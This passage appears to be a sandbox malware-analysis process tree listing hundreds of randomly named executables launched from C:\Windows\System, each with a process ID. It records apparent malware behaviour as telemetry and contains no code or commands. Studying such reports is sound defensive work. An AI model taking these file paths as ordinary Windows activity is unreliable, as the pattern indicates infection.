- C:\Windows\System\zSLpdto.exe
  C:\Windows\System\zSLpdto.exe
  2⤵
  PID:3452
- C:\Windows\System\JhmYxbp.exe
  C:\Windows\System\JhmYxbp.exe
  2⤵
  PID:4412
- C:\Windows\System\QFQPmtB.exe
  C:\Windows\System\QFQPmtB.exe
  2⤵
  PID:4156
- C:\Windows\System\AgQJDnK.exe
  C:\Windows\System\AgQJDnK.exe
  2⤵
  PID:4536
- C:\Windows\System\UTeMzDG.exe
  C:\Windows\System\UTeMzDG.exe
  2⤵
  PID:4472
- C:\Windows\System\kyTmPJh.exe
  C:\Windows\System\kyTmPJh.exe
  2⤵
  PID:4728
- C:\Windows\System\LasrcNb.exe
  C:\Windows\System\LasrcNb.exe
  2⤵
  PID:3992
- C:\Windows\System\iHpVPhv.exe
  C:\Windows\System\iHpVPhv.exe
  2⤵
  PID:4332
- C:\Windows\System\xnKXibE.exe
  C:\Windows\System\xnKXibE.exe
  2⤵
  PID:4908
- C:\Windows\System\PapUYtB.exe
  C:\Windows\System\PapUYtB.exe
  2⤵
  PID:4280
- C:\Windows\System\TwxBpQo.exe
  C:\Windows\System\TwxBpQo.exe
  2⤵
  PID:4696
- C:\Windows\System\kWttfZl.exe
  C:\Windows\System\kWttfZl.exe
  2⤵
  PID:4892
- C:\Windows\System\dAANvqK.exe
  C:\Windows\System\dAANvqK.exe
  2⤵
  PID:4248
- C:\Windows\System\rkZgqZY.exe
  C:\Windows\System\rkZgqZY.exe
  2⤵
  PID:5068
- C:\Windows\System\ajXzQSa.exe
  C:\Windows\System\ajXzQSa.exe
  2⤵
  PID:5128
- C:\Windows\System\pezNEZH.exe
  C:\Windows\System\pezNEZH.exe
  2⤵
  PID:5144
- C:\Windows\System\cEKrGZh.exe
  C:\Windows\System\cEKrGZh.exe
  2⤵
  PID:5160
- C:\Windows\System\TgmoMjy.exe
  C:\Windows\System\TgmoMjy.exe
  2⤵
  PID:5176
- C:\Windows\System\hdCwTBO.exe
  C:\Windows\System\hdCwTBO.exe
  2⤵
  PID:5192
- C:\Windows\System\UhJypjc.exe
  C:\Windows\System\UhJypjc.exe
  2⤵
  PID:5208
- C:\Windows\System\HyQEiwA.exe
  C:\Windows\System\HyQEiwA.exe
  2⤵
  PID:5224
- C:\Windows\System\fjOEVKW.exe
  C:\Windows\System\fjOEVKW.exe
  2⤵
  PID:5240
- C:\Windows\System\yAZARCj.exe
  C:\Windows\System\yAZARCj.exe
  2⤵
  PID:5256
- C:\Windows\System\vseJSLD.exe
  C:\Windows\System\vseJSLD.exe
  2⤵
  PID:5272
- C:\Windows\System\cEWmRzw.exe
  C:\Windows\System\cEWmRzw.exe
  2⤵
  PID:5288
- C:\Windows\System\nEwExbN.exe
  C:\Windows\System\nEwExbN.exe
  2⤵
  PID:5304
- C:\Windows\System\UzOGIYn.exe
  C:\Windows\System\UzOGIYn.exe
  2⤵
  PID:5320
- C:\Windows\System\GgsGTcV.exe
  C:\Windows\System\GgsGTcV.exe
  2⤵
  PID:5336
- C:\Windows\System\nFgCSuf.exe
  C:\Windows\System\nFgCSuf.exe
  2⤵
  PID:5352
- C:\Windows\System\prmREEw.exe
  C:\Windows\System\prmREEw.exe
  2⤵
  PID:5368
- C:\Windows\System\ebqsnZF.exe
  C:\Windows\System\ebqsnZF.exe
  2⤵
  PID:5384
- C:\Windows\System\FRMqFDO.exe
  C:\Windows\System\FRMqFDO.exe
  2⤵
  PID:5400
- C:\Windows\System\zEmTTqO.exe
  C:\Windows\System\zEmTTqO.exe
  2⤵
  PID:5416
- C:\Windows\System\xoVtREc.exe
  C:\Windows\System\xoVtREc.exe
  2⤵
  PID:5432
- C:\Windows\System\LQmJeKc.exe
  C:\Windows\System\LQmJeKc.exe
  2⤵
  PID:5448
- C:\Windows\System\AIqFDXT.exe
  C:\Windows\System\AIqFDXT.exe
  2⤵
  PID:5464
- C:\Windows\System\LXEEeKh.exe
  C:\Windows\System\LXEEeKh.exe
  2⤵
  PID:5480
- C:\Windows\System\qUGTlZn.exe
  C:\Windows\System\qUGTlZn.exe
  2⤵
  PID:5496
- C:\Windows\System\OVFoeZg.exe
  C:\Windows\System\OVFoeZg.exe
  2⤵
  PID:5512
- C:\Windows\System\lUEIiCv.exe
  C:\Windows\System\lUEIiCv.exe
  2⤵
  PID:5528
- C:\Windows\System\rrSyuCc.exe
  C:\Windows\System\rrSyuCc.exe
  2⤵
  PID:5544
- C:\Windows\System\oTHCCSG.exe
  C:\Windows\System\oTHCCSG.exe
  2⤵
  PID:5560
- C:\Windows\System\pKSHUvH.exe
  C:\Windows\System\pKSHUvH.exe
  2⤵
  PID:5576
- C:\Windows\System\yoseJta.exe
  C:\Windows\System\yoseJta.exe
  2⤵
  PID:5592
- C:\Windows\System\HsQuDni.exe
  C:\Windows\System\HsQuDni.exe
  2⤵
  PID:5608
- C:\Windows\System\vbVKISU.exe
  C:\Windows\System\vbVKISU.exe
  2⤵
  PID:5624
- C:\Windows\System\KklUFhS.exe
  C:\Windows\System\KklUFhS.exe
  2⤵
  PID:5640
- C:\Windows\System\eTEdhQH.exe
  C:\Windows\System\eTEdhQH.exe
  2⤵
  PID:5656
- C:\Windows\System\vfInffU.exe
  C:\Windows\System\vfInffU.exe
  2⤵
  PID:5672
- C:\Windows\System\EnzoVIf.exe
  C:\Windows\System\EnzoVIf.exe
  2⤵
  PID:5688
- C:\Windows\System\WQBuUww.exe
  C:\Windows\System\WQBuUww.exe
  2⤵
  PID:5704
- C:\Windows\System\pYjoAsW.exe
  C:\Windows\System\pYjoAsW.exe
  2⤵
  PID:5720
- C:\Windows\System\UdQOnRw.exe
  C:\Windows\System\UdQOnRw.exe
  2⤵
  PID:5736
- C:\Windows\System\upaGBZv.exe
  C:\Windows\System\upaGBZv.exe
  2⤵
  PID:5752
- C:\Windows\System\CPZBAFJ.exe
  C:\Windows\System\CPZBAFJ.exe
  2⤵
  PID:5768
- C:\Windows\System\BfATNJx.exe
  C:\Windows\System\BfATNJx.exe
  2⤵
  PID:5784
- C:\Windows\System\TaroJXS.exe
  C:\Windows\System\TaroJXS.exe
  2⤵
  PID:5800
- C:\Windows\System\btSMunU.exe
  C:\Windows\System\btSMunU.exe
  2⤵
  PID:5816
- C:\Windows\System\EjtThQH.exe
  C:\Windows\System\EjtThQH.exe
  2⤵
  PID:5832
- C:\Windows\System\LnMIssI.exe
  C:\Windows\System\LnMIssI.exe
  2⤵
  PID:5848
- C:\Windows\System\KyOvsLZ.exe
  C:\Windows\System\KyOvsLZ.exe
  2⤵
  PID:5864
- C:\Windows\System\XkapyJW.exe
  C:\Windows\System\XkapyJW.exe
  2⤵
  PID:5880
- C:\Windows\System\ZCFNfld.exe
  C:\Windows\System\ZCFNfld.exe
  2⤵
  PID:5896
- C:\Windows\System\EEHmsIh.exe
  C:\Windows\System\EEHmsIh.exe
  2⤵
  PID:5912
- C:\Windows\System\hYbZrsi.exe
  C:\Windows\System\hYbZrsi.exe
  2⤵
  PID:5928
- C:\Windows\System\rXpAuEt.exe
  C:\Windows\System\rXpAuEt.exe
  2⤵
  PID:5944
- C:\Windows\System\qQCBPRy.exe
  C:\Windows\System\qQCBPRy.exe
  2⤵
  PID:5960
- C:\Windows\System\bDoOlPg.exe
  C:\Windows\System\bDoOlPg.exe
  2⤵
  PID:5976
- C:\Windows\System\JvXXNtn.exe
  C:\Windows\System\JvXXNtn.exe
  2⤵
  PID:5992
- C:\Windows\System\ClWBPuO.exe
  C:\Windows\System\ClWBPuO.exe
  2⤵
  PID:6008
- C:\Windows\System\YimBkNU.exe
  C:\Windows\System\YimBkNU.exe
  2⤵
  PID:6024
- C:\Windows\System\ISeKpqv.exe
  C:\Windows\System\ISeKpqv.exe
  2⤵
  PID:6040
- C:\Windows\System\OBKivRx.exe
  C:\Windows\System\OBKivRx.exe
  2⤵
  PID:6056
- C:\Windows\System\NnwQdMP.exe
  C:\Windows\System\NnwQdMP.exe
  2⤵
  PID:6072
- C:\Windows\System\kigsZVc.exe
  C:\Windows\System\kigsZVc.exe
  2⤵
  PID:6088
- C:\Windows\System\eKRxtys.exe
  C:\Windows\System\eKRxtys.exe
  2⤵
  PID:6104
- C:\Windows\System\echZVnw.exe
  C:\Windows\System\echZVnw.exe
  2⤵
  PID:6120
- C:\Windows\System\RMVLCmE.exe
  C:\Windows\System\RMVLCmE.exe
  2⤵
  PID:6136
- C:\Windows\System\mtzZSWr.exe
  C:\Windows\System\mtzZSWr.exe
  2⤵
  PID:3164
- C:\Windows\System\fQxInof.exe
  C:\Windows\System\fQxInof.exe
  2⤵
  PID:4392
- C:\Windows\System\DDeGZEv.exe
  C:\Windows\System\DDeGZEv.exe
  2⤵
  PID:5084
- C:\Windows\System\JhUxCWW.exe
  C:\Windows\System\JhUxCWW.exe
  2⤵
  PID:5124
- C:\Windows\System\UVJNckM.exe
  C:\Windows\System\UVJNckM.exe
  2⤵
  PID:5220
- C:\Windows\System\cYapCxr.exe
  C:\Windows\System\cYapCxr.exe
  2⤵
  PID:5284
- C:\Windows\System\NCtdyQN.exe
  C:\Windows\System\NCtdyQN.exe
  2⤵
  PID:5200
- C:\Windows\System\dzNzGjD.exe
  C:\Windows\System\dzNzGjD.exe
  2⤵
  PID:5348
- C:\Windows\System\QPrIRCQ.exe
  C:\Windows\System\QPrIRCQ.exe
  2⤵
  PID:5268
- C:\Windows\System\NoHhGHU.exe
  C:\Windows\System\NoHhGHU.exe
  2⤵
  PID:5408
- C:\Windows\System\ZPScion.exe
  C:\Windows\System\ZPScion.exe
  2⤵
  PID:5232
- C:\Windows\System\JvpMSvm.exe
  C:\Windows\System\JvpMSvm.exe
  2⤵
  PID:5428
- C:\Windows\System\bWLGmeV.exe
  C:\Windows\System\bWLGmeV.exe
  2⤵
  PID:5364
- C:\Windows\System\fdGNwIK.exe
  C:\Windows\System\fdGNwIK.exe
  2⤵
  PID:5536
- C:\Windows\System\cYonFYx.exe
  C:\Windows\System\cYonFYx.exe
  2⤵
  PID:5460
- C:\Windows\System\PXdroso.exe
  C:\Windows\System\PXdroso.exe
  2⤵
  PID:5568
- C:\Windows\System\DpKoaEX.exe
  C:\Windows\System\DpKoaEX.exe
  2⤵
  PID:5636
- C:\Windows\System\NucjSHP.exe
  C:\Windows\System\NucjSHP.exe
  2⤵
  PID:5700
- C:\Windows\System\xeZsRWj.exe
  C:\Windows\System\xeZsRWj.exe
  2⤵
  PID:5760
- C:\Windows\System\GGVhtLD.exe
  C:\Windows\System\GGVhtLD.exe
  2⤵
  PID:5524
- C:\Windows\System\ZgSQcSc.exe
  C:\Windows\System\ZgSQcSc.exe
  2⤵
  PID:5588
- C:\Windows\System\LlSoodx.exe
  C:\Windows\System\LlSoodx.exe
  2⤵
  PID:5680
- C:\Windows\System\mVYhmbq.exe
  C:\Windows\System\mVYhmbq.exe
  2⤵
  PID:5744
- C:\Windows\System\PrvQifm.exe
  C:\Windows\System\PrvQifm.exe
  2⤵
  PID:5796
- C:\Windows\System\yhdHpNn.exe
  C:\Windows\System\yhdHpNn.exe
  2⤵
  PID:5812
- C:\Windows\System\KkLGNYr.exe
  C:\Windows\System\KkLGNYr.exe
  2⤵
  PID:5860
- C:\Windows\System\GwGhBYa.exe
  C:\Windows\System\GwGhBYa.exe
  2⤵
  PID:5876
- C:\Windows\System\TetAdUk.exe
  C:\Windows\System\TetAdUk.exe
  2⤵
  PID:5904
- C:\Windows\System\QKNeXHZ.exe
  C:\Windows\System\QKNeXHZ.exe
  2⤵
  PID:5968
- C:\Windows\System\rkuSruT.exe
  C:\Windows\System\rkuSruT.exe
  2⤵
  PID:5956
- C:\Windows\System\jYGSdhT.exe
  C:\Windows\System\jYGSdhT.exe
  2⤵
  PID:6004
- C:\Windows\System\LFRQSql.exe
  C:\Windows\System\LFRQSql.exe
  2⤵
  PID:6084
- C:\Windows\System\CwUoMwf.exe
  C:\Windows\System\CwUoMwf.exe
  2⤵
  PID:6036
- C:\Windows\System\BDXrCHs.exe
  C:\Windows\System\BDXrCHs.exe
  2⤵
  PID:6032
- C:\Windows\System\GbHozgu.exe
  C:\Windows\System\GbHozgu.exe
  2⤵
  PID:5316
- C:\Windows\System\JEXuSMx.exe
  C:\Windows\System\JEXuSMx.exe
  2⤵
  PID:5264
- C:\Windows\System\slWJbVh.exe
  C:\Windows\System\slWJbVh.exe
  2⤵
  PID:5444
- C:\Windows\System\WJbZehB.exe
  C:\Windows\System\WJbZehB.exe
  2⤵
  PID:5296
- C:\Windows\System\rLlZlcW.exe
  C:\Windows\System\rLlZlcW.exe
  2⤵
  PID:5488
- C:\Windows\System\llbiLLv.exe
  C:\Windows\System\llbiLLv.exe
  2⤵
  PID:5136
- C:\Windows\System\nCwBkqY.exe
  C:\Windows\System\nCwBkqY.exe
  2⤵
  PID:5020
- C:\Windows\System\jgXQmzM.exe
  C:\Windows\System\jgXQmzM.exe
  2⤵
  PID:5728
- C:\Windows\System\pfnlBXX.exe
  C:\Windows\System\pfnlBXX.exe
  2⤵
  PID:5328
- C:\Windows\System\RVKLBWi.exe
  C:\Windows\System\RVKLBWi.exe
  2⤵
  PID:5508
- C:\Windows\System\FJaPOZS.exe
  C:\Windows\System\FJaPOZS.exe
  2⤵
  PID:5668
- C:\Windows\System\OcHXgpL.exe
  C:\Windows\System\OcHXgpL.exe
  2⤵
  PID:5652
- C:\Windows\System\ixEYHeF.exe
  C:\Windows\System\ixEYHeF.exe
  2⤵
  PID:5808
- C:\Windows\System\aqKmFUL.exe
  C:\Windows\System\aqKmFUL.exe
  2⤵
  PID:5856
- C:\Windows\System\rxtycCv.exe
  C:\Windows\System\rxtycCv.exe
  2⤵
  PID:5936
- C:\Windows\System\pnDBQXc.exe
  C:\Windows\System\pnDBQXc.exe
  2⤵
  PID:5920
- C:\Windows\System\GvrYuOG.exe
  C:\Windows\System\GvrYuOG.exe
  2⤵
  PID:6112
- C:\Windows\System\yNKcCbd.exe
  C:\Windows\System\yNKcCbd.exe
  2⤵
  PID:4808
- C:\Windows\System\kkpdBLm.exe
  C:\Windows\System\kkpdBLm.exe
  2⤵
  PID:4984
- C:\Windows\System\odwbbtG.exe
  C:\Windows\System\odwbbtG.exe
  2⤵
  PID:5152
- C:\Windows\System\gTCurIn.exe
  C:\Windows\System\gTCurIn.exe
  2⤵
  PID:5032
- C:\Windows\System\HQRLwBl.exe
  C:\Windows\System\HQRLwBl.exe
  2⤵
  PID:5556
- C:\Windows\System\zlyMOhF.exe
  C:\Windows\System\zlyMOhF.exe
  2⤵
  PID:5716
- C:\Windows\System\JajZNpe.exe
  C:\Windows\System\JajZNpe.exe
  2⤵
  PID:5924
- C:\Windows\System\XUzjBzQ.exe
  C:\Windows\System\XUzjBzQ.exe
  2⤵
  PID:6152
- C:\Windows\System\BnRVmNm.exe
  C:\Windows\System\BnRVmNm.exe
  2⤵
  PID:6168
- C:\Windows\System\RkjyLlC.exe
  C:\Windows\System\RkjyLlC.exe
  2⤵
  PID:6184
- C:\Windows\System\qqHdroo.exe
  C:\Windows\System\qqHdroo.exe
  2⤵
  PID:6200
- C:\Windows\System\NMvRban.exe
  C:\Windows\System\NMvRban.exe
  2⤵
  PID:6216
- C:\Windows\System\uwdpfmL.exe
  C:\Windows\System\uwdpfmL.exe
  2⤵
  PID:6232
- C:\Windows\System\zulbzIE.exe
  C:\Windows\System\zulbzIE.exe
  2⤵
  PID:6248
- C:\Windows\System\EkwGvSp.exe
  C:\Windows\System\EkwGvSp.exe
  2⤵
  PID:6264
- C:\Windows\System\tvHQKWQ.exe
  C:\Windows\System\tvHQKWQ.exe
  2⤵
  PID:6284
- C:\Windows\System\IBNnzmb.exe
  C:\Windows\System\IBNnzmb.exe
  2⤵
  PID:6300
- C:\Windows\System\mOoNsyE.exe
  C:\Windows\System\mOoNsyE.exe
  2⤵
  PID:6316
- C:\Windows\System\WOOYiMW.exe
  C:\Windows\System\WOOYiMW.exe
  2⤵
  PID:6332
- C:\Windows\System\uaxmtBH.exe
  C:\Windows\System\uaxmtBH.exe
  2⤵
  PID:6348
- C:\Windows\System\YXhwFin.exe
  C:\Windows\System\YXhwFin.exe
  2⤵
  PID:6364
- C:\Windows\System\klbjhwy.exe
  C:\Windows\System\klbjhwy.exe
  2⤵
  PID:6380
- C:\Windows\System\zFAkcfD.exe
  C:\Windows\System\zFAkcfD.exe
  2⤵
  PID:6396
- C:\Windows\System\huCEVgO.exe
  C:\Windows\System\huCEVgO.exe
  2⤵
  PID:6412
- C:\Windows\System\ElxEXAg.exe
  C:\Windows\System\ElxEXAg.exe
  2⤵
  PID:6428
- C:\Windows\System\yrLIOLV.exe
  C:\Windows\System\yrLIOLV.exe
  2⤵
  PID:6444
- C:\Windows\System\ttmYVNn.exe
  C:\Windows\System\ttmYVNn.exe
  2⤵
  PID:6460
- C:\Windows\System\AXaJUcU.exe
  C:\Windows\System\AXaJUcU.exe
  2⤵
  PID:6476
- C:\Windows\System\AzpDGKK.exe
  C:\Windows\System\AzpDGKK.exe
  2⤵
  PID:6492
- C:\Windows\System\hKxIZoK.exe
  C:\Windows\System\hKxIZoK.exe
  2⤵
  PID:6508
- C:\Windows\System\MIctlqs.exe
  C:\Windows\System\MIctlqs.exe
  2⤵
  PID:6524
- C:\Windows\System\Wqoouqn.exe
  C:\Windows\System\Wqoouqn.exe
  2⤵
  PID:6540
- C:\Windows\System\IvPKZWR.exe
  C:\Windows\System\IvPKZWR.exe
  2⤵
  PID:6556
- C:\Windows\System\bkjVjmz.exe
  C:\Windows\System\bkjVjmz.exe
  2⤵
  PID:6572
- C:\Windows\System\lQZQgpQ.exe
  C:\Windows\System\lQZQgpQ.exe
  2⤵
  PID:6588
- C:\Windows\System\VmqiiID.exe
  C:\Windows\System\VmqiiID.exe
  2⤵
  PID:6604
- C:\Windows\System\RnwussR.exe
  C:\Windows\System\RnwussR.exe
  2⤵
  PID:6620
- C:\Windows\System\orvJIVz.exe
  C:\Windows\System\orvJIVz.exe
  2⤵
  PID:6636
- C:\Windows\System\LgLDCJY.exe
  C:\Windows\System\LgLDCJY.exe
  2⤵
  PID:6652
- C:\Windows\System\kOEZDtG.exe
  C:\Windows\System\kOEZDtG.exe
  2⤵
  PID:6668
- C:\Windows\System\fTpiMoQ.exe
  C:\Windows\System\fTpiMoQ.exe
  2⤵
  PID:6684
- C:\Windows\System\SXRSLPt.exe
  C:\Windows\System\SXRSLPt.exe
  2⤵
  PID:6700
- C:\Windows\System\mnNCdxN.exe
  C:\Windows\System\mnNCdxN.exe
  2⤵
  PID:6716
- C:\Windows\System\IoeCXFM.exe
  C:\Windows\System\IoeCXFM.exe
  2⤵
  PID:6732
- C:\Windows\System\KEuBKZp.exe
  C:\Windows\System\KEuBKZp.exe
  2⤵
  PID:6748
- C:\Windows\System\UHCQDtN.exe
  C:\Windows\System\UHCQDtN.exe
  2⤵
  PID:6764
- C:\Windows\System\AdCYyxA.exe
  C:\Windows\System\AdCYyxA.exe
  2⤵
  PID:6780
- C:\Windows\System\FYmnJfW.exe
  C:\Windows\System\FYmnJfW.exe
  2⤵
  PID:6796
- C:\Windows\System\PkdXntc.exe
  C:\Windows\System\PkdXntc.exe
  2⤵
  PID:6812
- C:\Windows\System\HiDaPwZ.exe
  C:\Windows\System\HiDaPwZ.exe
  2⤵
  PID:6828
- C:\Windows\System\dEXSEfN.exe
  C:\Windows\System\dEXSEfN.exe
  2⤵
  PID:6844
- C:\Windows\System\MccsyIk.exe
  C:\Windows\System\MccsyIk.exe
  2⤵
  PID:6860
- C:\Windows\System\vaNwrca.exe
  C:\Windows\System\vaNwrca.exe
  2⤵
  PID:6880
- C:\Windows\System\FXSIbIw.exe
  C:\Windows\System\FXSIbIw.exe
  2⤵
  PID:6896
- C:\Windows\System\RpbswAb.exe
  C:\Windows\System\RpbswAb.exe
  2⤵
  PID:6912
- C:\Windows\System\cxPEHLf.exe
  C:\Windows\System\cxPEHLf.exe
  2⤵
  PID:6928
- C:\Windows\System\NhhlMiw.exe
  C:\Windows\System\NhhlMiw.exe
  2⤵
  PID:6948
- C:\Windows\System\JMnApKr.exe
  C:\Windows\System\JMnApKr.exe
  2⤵
  PID:6964
- C:\Windows\System\vwcCNmn.exe
  C:\Windows\System\vwcCNmn.exe
  2⤵
  PID:6980
- C:\Windows\System\ALHtGnC.exe
  C:\Windows\System\ALHtGnC.exe
  2⤵
  PID:6996
- C:\Windows\System\FVuRemD.exe
  C:\Windows\System\FVuRemD.exe
  2⤵
  PID:7012
- C:\Windows\System\CUbopRW.exe
  C:\Windows\System\CUbopRW.exe
  2⤵
  PID:7028
- C:\Windows\System\OfAmeuq.exe
  C:\Windows\System\OfAmeuq.exe
  2⤵
  PID:7044
- C:\Windows\System\wrhQLHN.exe
  C:\Windows\System\wrhQLHN.exe
  2⤵
  PID:7060
- C:\Windows\System\LtBtSgv.exe
  C:\Windows\System\LtBtSgv.exe
  2⤵
  PID:7080
- C:\Windows\System\ZBRnFAY.exe
  C:\Windows\System\ZBRnFAY.exe
  2⤵
  PID:7096
- C:\Windows\System\WSChZLh.exe
  C:\Windows\System\WSChZLh.exe
  2⤵
  PID:7112
- C:\Windows\System\tGodEgJ.exe
  C:\Windows\System\tGodEgJ.exe
  2⤵
  PID:7132
- C:\Windows\System\kQROjka.exe
  C:\Windows\System\kQROjka.exe
  2⤵
  PID:7148
- C:\Windows\System\MHCrBqD.exe
  C:\Windows\System\MHCrBqD.exe
  2⤵
  PID:7164
- C:\Windows\System\uvBXXAn.exe
  C:\Windows\System\uvBXXAn.exe
  2⤵
  PID:5172
- C:\Windows\System\HNpXxbh.exe
  C:\Windows\System\HNpXxbh.exe
  2⤵
  PID:3920
- C:\Windows\System\OupFqbJ.exe
  C:\Windows\System\OupFqbJ.exe
  2⤵
  PID:5504
- C:\Windows\System\BrnOKwA.exe
  C:\Windows\System\BrnOKwA.exe
  2⤵
  PID:5792
- C:\Windows\System\MdgFELo.exe
  C:\Windows\System\MdgFELo.exe
  2⤵
  PID:6020
- C:\Windows\System\NHRZxiy.exe
  C:\Windows\System\NHRZxiy.exe
  2⤵
  PID:6068
- C:\Windows\System\SJjgqsU.exe
  C:\Windows\System\SJjgqsU.exe
  2⤵
  PID:6160
- C:\Windows\System\RnGtnTC.exe
  C:\Windows\System\RnGtnTC.exe
  2⤵
  PID:6224
- C:\Windows\System\lgkutUW.exe
  C:\Windows\System\lgkutUW.exe
  2⤵
  PID:6208
- C:\Windows\System\MtwUQHb.exe
  C:\Windows\System\MtwUQHb.exe
  2⤵
  PID:6272
- C:\Windows\System\qoYIsQM.exe
  C:\Windows\System\qoYIsQM.exe
  2⤵
  PID:6340
- C:\Windows\System\ddjrdvX.exe
  C:\Windows\System\ddjrdvX.exe
  2⤵
  PID:6408
- C:\Windows\System\qHxrhle.exe
  C:\Windows\System\qHxrhle.exe
  2⤵
  PID:6472
- C:\Windows\System\EtDjpsS.exe
  C:\Windows\System\EtDjpsS.exe
  2⤵
  PID:6536
- C:\Windows\System\GdtbhcZ.exe
  C:\Windows\System\GdtbhcZ.exe
  2⤵
  PID:6564
- C:\Windows\System\lWGLIHw.exe
  C:\Windows\System\lWGLIHw.exe
  2⤵
  PID:6296
- C:\Windows\System\tMLhGtE.exe
  C:\Windows\System\tMLhGtE.exe
  2⤵
  PID:6452
- C:\Windows\System\Jfvihvf.exe
  C:\Windows\System\Jfvihvf.exe
  2⤵
  PID:6632
- C:\Windows\System\pSHpvGT.exe
  C:\Windows\System\pSHpvGT.exe
  2⤵
  PID:6360
- C:\Windows\System\wdFZkuQ.exe
  C:\Windows\System\wdFZkuQ.exe
  2⤵
  PID:6484
- C:\Windows\System\RpFDBke.exe
  C:\Windows\System\RpFDBke.exe
  2⤵
  PID:6548
- C:\Windows\System\ERXOnRY.exe
  C:\Windows\System\ERXOnRY.exe
  2⤵
  PID:6692
- C:\Windows\System\wdZdlYr.exe
  C:\Windows\System\wdZdlYr.exe
  2⤵
  PID:6648
- C:\Windows\System\pzrszlF.exe
  C:\Windows\System\pzrszlF.exe
  2⤵
  PID:6708
- C:\Windows\System\vvNhFsq.exe
  C:\Windows\System\vvNhFsq.exe
  2⤵
  PID:6740
- C:\Windows\System\DjrBfdN.exe
  C:\Windows\System\DjrBfdN.exe
  2⤵
  PID:6792
- C:\Windows\System\wnYmkfh.exe
  C:\Windows\System\wnYmkfh.exe
  2⤵
  PID:6808
- C:\Windows\System\rydwDpB.exe
  C:\Windows\System\rydwDpB.exe
  2⤵
  PID:6876
- C:\Windows\System\orjbrmX.exe
  C:\Windows\System\orjbrmX.exe
  2⤵
  PID:6936
- C:\Windows\System\nvbnFLJ.exe
  C:\Windows\System\nvbnFLJ.exe
  2⤵
  PID:6976
- C:\Windows\System\NYjnckC.exe
  C:\Windows\System\NYjnckC.exe
  2⤵
  PID:6920
- C:\Windows\System\UFjYSfj.exe
  C:\Windows\System\UFjYSfj.exe
  2⤵
  PID:6988
- C:\Windows\System\MuPtwuN.exe
  C:\Windows\System\MuPtwuN.exe
  2⤵
  PID:7088
- C:\Windows\System\yFiYOlR.exe
  C:\Windows\System\yFiYOlR.exe
  2⤵
  PID:7052
- C:\Windows\System\KksFqcL.exe
  C:\Windows\System\KksFqcL.exe
  2⤵
  PID:7160
- C:\Windows\System\gVKpxhT.exe
  C:\Windows\System\gVKpxhT.exe
  2⤵
  PID:5648
- C:\Windows\System\mGUyGYs.exe
  C:\Windows\System\mGUyGYs.exe
  2⤵
  PID:5048
- C:\Windows\System\AbMLtRN.exe
  C:\Windows\System\AbMLtRN.exe
  2⤵
  PID:6064
- C:\Windows\System\QsEfcrs.exe
  C:\Windows\System\QsEfcrs.exe
  2⤵
  PID:7040
- C:\Windows\System\zdqsJub.exe
  C:\Windows\System\zdqsJub.exe
  2⤵
  PID:7140
- C:\Windows\System\bpXLyyC.exe
  C:\Windows\System\bpXLyyC.exe
  2⤵
  PID:6148
- C:\Windows\System\jmaEEax.exe
  C:\Windows\System\jmaEEax.exe
  2⤵
  PID:5892
- C:\Windows\System\YDxNcXM.exe
  C:\Windows\System\YDxNcXM.exe
  2⤵
  PID:6372
- C:\Windows\System\wRlxhnL.exe
  C:\Windows\System\wRlxhnL.exe
  2⤵
  PID:6392
- C:\Windows\System\xSRcuuG.exe
  C:\Windows\System\xSRcuuG.exe
  2⤵
  PID:6664
- C:\Windows\System\rUSPEZj.exe
  C:\Windows\System\rUSPEZj.exe
  2⤵
  PID:6308
- C:\Windows\System\AdUAQAs.exe
  C:\Windows\System\AdUAQAs.exe
  2⤵
  PID:6680
- C:\Windows\System\psCcCXN.exe
  C:\Windows\System\psCcCXN.exe
  2⤵
  PID:6516
- C:\Windows\System\zwcuUMY.exe
  C:\Windows\System\zwcuUMY.exe
  2⤵
  PID:6724
- C:\Windows\System\dMFBShe.exe
  C:\Windows\System\dMFBShe.exe
  2⤵
  PID:6760
- C:\Windows\System\ffPreif.exe
  C:\Windows\System\ffPreif.exe
  2⤵
  PID:6788
- C:\Windows\System\JwdHxBU.exe
  C:\Windows\System\JwdHxBU.exe
  2⤵
  PID:6944
- C:\Windows\System\mjQhlZM.exe
  C:\Windows\System\mjQhlZM.exe
  2⤵
  PID:6820
- C:\Windows\System\IwCbgIk.exe
  C:\Windows\System\IwCbgIk.exe
  2⤵
  PID:6904
- C:\Windows\System\PNrqAPx.exe
  C:\Windows\System\PNrqAPx.exe
  2⤵
  PID:5140
- C:\Windows\System\fycelgS.exe
  C:\Windows\System\fycelgS.exe
  2⤵
  PID:7020
- C:\Windows\System\LdtyZwi.exe
  C:\Windows\System\LdtyZwi.exe
  2⤵
  PID:7024
- C:\Windows\System\dNXfmDS.exe
  C:\Windows\System\dNXfmDS.exe
  2⤵
  PID:5440
- C:\Windows\System\SBguZBo.exe
  C:\Windows\System\SBguZBo.exe
  2⤵
  PID:6240
- C:\Windows\System\mPlEaRh.exe
  C:\Windows\System\mPlEaRh.exe
  2⤵
  PID:6356
- C:\Windows\System\qKzGuqN.exe
  C:\Windows\System\qKzGuqN.exe
  2⤵
  PID:6468
- C:\Windows\System\zMsEZmb.exe
  C:\Windows\System\zMsEZmb.exe
  2⤵
  PID:6644
- C:\Windows\System\ZGOsbKb.exe
  C:\Windows\System\ZGOsbKb.exe
  2⤵
  PID:6960
- C:\Windows\System\GJbKfVS.exe
  C:\Windows\System\GJbKfVS.exe
  2⤵
  PID:5988
- C:\Windows\System\qJwKGyK.exe
  C:\Windows\System\qJwKGyK.exe
  2⤵
  PID:6192
- C:\Windows\System\miXMXaR.exe
  C:\Windows\System\miXMXaR.exe
  2⤵
  PID:7156
- C:\Windows\System\thTFreu.exe
  C:\Windows\System\thTFreu.exe
  2⤵
  PID:7072
- C:\Windows\System\dUQYiOw.exe
  C:\Windows\System\dUQYiOw.exe
  2⤵
  PID:6756
- C:\Windows\System\nmExJcN.exe
  C:\Windows\System\nmExJcN.exe
  2⤵
  PID:6176
- C:\Windows\System\DdRmWSG.exe
  C:\Windows\System\DdRmWSG.exe
  2⤵
  PID:6868
- C:\Windows\System\TUJWTio.exe
  C:\Windows\System\TUJWTio.exe
  2⤵
  PID:6420
- C:\Windows\System\WDtHbTB.exe
  C:\Windows\System\WDtHbTB.exe
  2⤵
  PID:6568
- C:\Windows\System\ayRgJIW.exe
  C:\Windows\System\ayRgJIW.exe
  2⤵
  PID:6596
- C:\Windows\System\lsOCgXe.exe
  C:\Windows\System\lsOCgXe.exe
  2⤵
  PID:6584
- C:\Windows\System\RjOqcSO.exe
  C:\Windows\System\RjOqcSO.exe
  2⤵
  PID:7120
- C:\Windows\System\qYLTUXN.exe
  C:\Windows\System\qYLTUXN.exe
  2⤵
  PID:7180
- C:\Windows\System\XjGbhSn.exe
  C:\Windows\System\XjGbhSn.exe
  2⤵
